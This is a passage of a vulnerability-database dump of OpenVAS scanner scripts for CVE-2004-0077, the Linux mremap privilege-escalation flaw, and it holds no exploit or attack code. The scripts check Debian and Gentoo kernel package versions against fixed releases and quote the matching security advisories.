script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.4.17-ia64\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.4.17-ia64\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-itanium-smp\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.4.17-mckinley-smp\", ver:\"011226.16\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus\nannounced via advisory DSA 466-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53163", "href": "http://plugins.openvas.org/nasl.php?oid=53163", "type": "openvas", "title": "Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_466_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 466-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.2.10-13woody1 of 2.2 kernel images for the powerpc/apus\narchitecture and in version 2.2.10-2 of Linux 2.2.10 source.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nwith the 2.4.20 kernel-image package for powerpc/apus. The old 2.2.10\nkernel image will be removed from Debian unstable.\n\nYou are strongly advised to switch to the fixed 2.4.17 kernel-image\npackage for powerpc/apus from woody until the 2.4.20 kernel-image\npackage is fixed in the unstable distribution.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus\nannounced via advisory DSA 466-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20466-1\";\n\nif(description)\n{\n script_id(53163);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 466-1 (kernel-source-2.2.10, kernel-image-2.2.10-powerpc-apus)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.10\", ver:\"2.2.10-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.10\", ver:\"2.2.10-2\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.10-apus\", ver:\"2.2.10-13woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.10-apus\", ver:\"2.2.10-13woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200403-02.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54527", "href": "http://plugins.openvas.org/nasl.php?oid=54527", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200403-02 (Kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"A critical security vulnerability has been found in recent Linux kernels by\nPaul Starzetz of iSEC Security Research which allows for local privilege\nescalations.\";\ntag_solution = \"Users are encouraged to upgrade to the latest available sources for their\nsystem:\n\n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n \n # # IF YOUR KERNEL IS MARKED as 'remerge required!' THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200403-02\nhttp://bugs.gentoo.org/show_bug.cgi?id=42024\nhttp://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200403-02.\";\n\n \n\nif(description)\n{\n script_id(54527);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200403-02 (Kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"sys-kernel/aa-sources\", unaffected: make_list(\"ge 2.4.23-r1\"), vulnerable: make_list(\"lt 2.4.23-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/alpha-sources\", unaffected: make_list(\"ge 2.4.21-r4\"), vulnerable: make_list(\"lt 2.4.21-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ck-sources\", unaffected: make_list(\"eq 2.4.24-r1\", \"ge 2.6.2-r1\"), vulnerable: make_list(\"lt 2.6.2-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/compaq-sources\", unaffected: make_list(\"ge 2.4.9.32.7-r2\"), vulnerable: make_list(\"lt 2.4.9.32.7-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/development-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gaming-sources\", unaffected: make_list(\"ge 2.4.20-r8\"), vulnerable: make_list(\"lt 2.4.20-r8\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gentoo-dev-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gentoo-sources\", unaffected: make_list(\"eq 2.4.19-r11\", \"eq 2.4.20-r12\", \"ge 2.4.22-r7\"), vulnerable: make_list(\"lt 2.4.22-r7\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/grsec-sources\", unaffected: make_list(\"ge 2.4.24.1.9.13-r1\"), vulnerable: make_list(\"lt 2.4.24.1.9.13-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/gs-sources\", unaffected: make_list(\"ge 2.4.25_pre7-r2\"), vulnerable: make_list(\"lt 2.4.25_pre7-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hardened-sources\", unaffected: make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hppa-dev-sources\", unaffected: make_list(\"ge 2.6.2_p3-r1\"), vulnerable: make_list(\"lt 2.6.2_p3-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/hppa-sources\", unaffected: make_list(\"ge 2.4.24_p0-r1\"), vulnerable: make_list(\"lt 2.4.24_p0-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ia64-sources\", unaffected: make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mips-prepatch-sources\", unaffected: make_list(\"ge 2.4.25_pre6-r1\"), vulnerable: make_list(\"lt 2.4.25_pre6-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mips-sources\", unaffected: make_list(\"ge 2.4.25_rc4\"), vulnerable: make_list(\"lt 2.4.25_rc4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/mm-sources\", unaffected: make_list(\"ge 2.6.3_rc1-r1\"), vulnerable: make_list(\"lt 2.6.3_rc1-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/openmosix-sources\", unaffected: make_list(\"ge 2.4.22-r4\"), vulnerable: make_list(\"lt 2.4.22-r4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/pac-sources\", unaffected: make_list(\"ge 2.4.23-r3\"), vulnerable: make_list(\"lt 2.4.23-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/planet-ccrma-sources\", unaffected: make_list(\"ge 2.4.21-r5\"), vulnerable: make_list(\"lt 2.4.21-r5\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-development-sources\", unaffected: make_list(\"ge 2.6.3_rc1-r1\"), vulnerable: make_list(\"lt 2.6.3_rc1-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources\", unaffected: make_list(\"ge 2.4.24-r1\"), vulnerable: make_list(\"lt 2.4.24-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-benh\", unaffected: make_list(\"ge 2.4.22-r5\"), vulnerable: make_list(\"lt 2.4.22-r5\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-crypto\", unaffected: make_list(\"ge 2.4.20-r3\"), vulnerable: make_list(\"lt 2.4.20-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/ppc-sources-dev\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/selinux-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/sparc-dev-sources\", unaffected: make_list(\"ge 2.6.3_rc1\"), vulnerable: make_list(\"lt 2.6.3_rc1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/sparc-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/usermode-sources\", unaffected: make_list(\"rge 2.4.24-r1\", \"rge 2.4.26\", \"ge 2.6.3-r1\"), vulnerable: make_list(\"lt 2.6.3-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/vanilla-prepatch-sources\", unaffected: make_list(\"ge 2.4.25_rc4\"), vulnerable: make_list(\"lt 2.4.25_rc4\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/vanilla-sources\", unaffected: make_list(\"ge 2.4.25\"), vulnerable: make_list(\"lt 2.4.25\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/win4lin-sources\", unaffected: make_list(\"eq 2.4.23-r2\", \"ge 2.6.2-r1\"), vulnerable: make_list(\"lt 2.6.2-r1\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/wolk-sources\", unaffected: make_list(\"eq 4.9-r4\", \"ge 4.10_pre7-r3\"), vulnerable: make_list(\"lt 4.10_pre7-r3\"))) != NULL) {\n report += res;\n}\nif ((res = ispkgvuln(pkg:\"sys-kernel/xfs-sources\", unaffected: make_list(\"ge 2.4.24-r2\"), vulnerable: make_list(\"lt 2.4.24-r2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.20,\nkernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386,\nkernel-image-2.2.20-amiga, kernel-image-2.2.20-atari,\nkernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac,\nkernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x,\nkernel-patch-2.2.20-powerpc announced via advisory DSA 453-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53681", "href": "http://plugins.openvas.org/nasl.php?oid=53681", "type": "openvas", "title": "Debian Security Advisory DSA 453-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_453_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 453-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\nkernel-source-2.2.20 source 2.2.20-5woody3\nkernel-image-2.2.20-i386 i386 2.2.20-5woody5\nkernel-image-2.2.20-reiserfs-i386 i386 2.2.20-4woody1\nkernel-image-2.2.20-amiga m68k 2.20-4\nkernel-image-2.2.20-atari m68k 2.2.20-3\nkernel-image-2.2.20-bvme6000 m68k 2.2.20-3\nkernel-image-2.2.20-mac m68k 2.2.20-3\nkernel-image-2.2.20-mvme147 m68k 2.2.20-3\nkernel-image-2.2.20-mvme16x m68k 2.2.20-3\nkernel-patch-2.2.20-powerpc powerpc 2.2.20-3woody1\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20,\nkernel-image-2.2.20-i386, kernel-image-2.2.20-reiserfs-i386,\nkernel-image-2.2.20-amiga, kernel-image-2.2.20-atari,\nkernel-image-2.2.20-bvme6000, kernel-image-2.2.20-mac,\nkernel-image-2.2.20-mvme147, kernel-image-2.2.20-mvme16x,\nkernel-patch-2.2.20-powerpc announced via advisory DSA 453-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20453-1\";\n\nif(description)\n{\n script_id(53681);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 453-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.2.20-powerpc\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-compact\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-idepci\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-compact\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-idepci\", ver:\"2.2.20-5woody5\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-reiserfs\", ver:\"2.2.20-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-reiserfs\", ver:\"2.2.20-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-amiga\", ver:\"2.2.20-4\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-atari\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-bvme6000\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mac\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mvme147\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-mvme16x\", ver:\"2.2.20-3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-chrp\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-pmac\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-prep\", ver:\"2.2.20-3woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.22, kernel-image-2.2.22-alpha\nannounced via advisory DSA 454-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53152", "href": "http://plugins.openvas.org/nasl.php?oid=53152", "type": "openvas", "title": "Debian Security Advisory DSA 454-1 (kernel-source-2.2.22, kernel-image-2.2.22-alpha)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_454_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 454-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nthe following versions and architectures:\n\nkernel-source-2.2.22 source 2.2.22-1woody1\nkernel-image-2.2.22-alpha alpha 2.2.22-2\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.22, kernel-image-2.2.22-alpha\nannounced via advisory DSA 454-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20454-1\";\n\nif(description)\n{\n script_id(53152);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 454-1 (kernel-source-2.2.22, kernel-image-2.2.22-alpha)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 